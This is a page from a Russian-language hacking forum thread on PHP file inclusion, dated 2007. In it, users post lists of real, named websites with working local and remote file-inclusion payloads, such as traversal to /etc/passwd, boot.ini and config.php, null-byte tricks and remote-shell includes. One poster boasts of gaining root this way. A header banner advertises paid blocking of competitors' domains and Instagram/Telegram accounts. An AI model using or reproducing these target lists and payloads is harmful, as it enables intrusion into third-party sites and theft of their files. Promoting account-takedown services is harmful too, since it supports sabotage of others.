УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
PHP Иньекции

Страница 9 из 143

« Первая

109

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#81

21.05.2007, 12:24

ForWarD-Hack

Новичок

Регистрация: 22.01.2007

Сообщений: 10

Провел на форуме:
78255

Репутация: 12

Отправить сообщение для ForWarD-Hack с помощью ICQ

Цитата:

http://www.apsny.ru/history/history.php?page=../forum/

админы жгут..

) пасы на рута в 1й из баз пустые.. +)

#82

21.05.2007, 13:08

ForWarD-Hack

Новичок

Регистрация: 22.01.2007

Сообщений: 10

Провел на форуме:
78255

Репутация: 12

Цитата:

http://ecsg.free.fr/index.php?page=[локальный]

include ""; =)

Цитата:

http://www.24hoursupport.com/index.php?page=[локальный]
fopen($menu_file_name, "r");

#83

21.05.2007, 14:05

ForWarD-Hack

Новичок

Регистрация: 22.01.2007

Сообщений: 10

Провел на форуме:
78255

Репутация: 12

Цитата:

http://lib.nbu.bg/eng/index.php?page=..\..\..\..\boot.ini

виндя

Цитата:

http://www.forestry.caf.wvu.edu/wvu_woodscience/index.php?page=../config.php

Цитата:

http://www.stlouisreview.com/archive/archive.php?page=[локальный]

Цитата:

http://www.bayareabikes.org/btwd/index.php?page=../../../../../../../etc/passwd

Цитата:

http://www.drps.org/template.php?page=/etc/passwd

Цитата:

http://www.myspacegraphicshelper.com/index.php?page=/etc/passwd

Цитата:

http://www.nnhs.net/library/show.php?page=[локальный]

но при желании можно сделать удалённый

Цитата:

http://www.egir.dk/index.php?page=/etc/passwd

Пока всё... скоро будет пополнение.. у мну ещё скулей много

#84

21.05.2007, 20:46

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

всеми любимый дом2, правда только wap пока...

http://wap.dom2.ru/index.php?area=../../../../../../../../../etc/passwd%00

или

http://wap.dom2.ru:81/index.php?area=../../../../../../../../../etc/passwd%00

__________________
Карфаген должен быть разрушен...

#85

22.05.2007, 17:23

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://www.33rus.ru/modules/Forums/admin/index.php?phpbb_root_path=[url]?

Последний раз редактировалось Grey; 22.05.2007 в 17:47..

#86

23.05.2007, 10:25

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Отправить сообщение для NOmeR1 с помощью ICQ

Цитата:

http://www.hd82.com/hd82/?doc=[url]

Цитата:

http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/passwd
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/hosts
http://raben.andre-mittelstädt.de/pub/cmpro.ext/include.php?url=../../../../../../etc/syslog.conf

Последний раз редактировалось NOmeR1; 23.05.2007 в 11:08..

#87

26.05.2007, 02:43

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Отправить сообщение для Muhacir с помощью ICQ

http://www.proteger.org.ar/download.php?file=[local]

#88

27.05.2007, 18:18

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Код:

http://www.starcat-dev.de/display.php?file=24&lan=[сайт]

вместо [сайт] соответственно адрес сайта вида http://site.narod.ru на котором есть шелл с названием shortnews.txt

ЗЫ кстати благодаря этой инъекции я получил root, без использования сплойтов и не расшифровывая хешей

__________________
Карфаген должен быть разрушен...

#89

28.05.2007, 13:25

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Это не инклуды, это require_once, но разницы походу никакой..
1.

Цитата:

http://www.photoconcept.ch/~scoutsmeyrin/index.php?require=[url]

Цитата:

http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/passwd
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/hosts
http://www.dreamsodam.co.kr/taeil.php?require=../../../../../../etc/syslog.conf

Цитата:

http://www.pandora-asia.org/panprojects.php?main=[url]
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/passwd
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/hosts
http://www.pandora-asia.org/panprojects.php?main=../../../../../../etc/syslog.conf

Последний раз редактировалось NOmeR1; 28.05.2007 в 13:32..

#90

29.05.2007, 22:26

NOmeR1

Познавший АНТИЧАТ

Регистрация: 02.06.2006

Сообщений: 1,188

Провел на форуме:
6023777

Репутация: 2642

Цитата:

http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/passwd
http://www.almoayedgroup.com/newsdesc.php?fileinclude=../../../../../../etc/hosts

Цитата:

http://www.marionovak.com/proba/include.php?includefile=[url]

Цитата:

http://www.dominoua.com.ua/build.php?file=[url]

Цитата:

http://www.kiyavia.crimea.ua/index.php?[url]

Последний раз редактировалось NOmeR1; 29.05.2007 в 22:52..

Страница 9 из 143

« Первая

109

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books	PSalm69	Избранное	273	13.02.2016 01:24
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход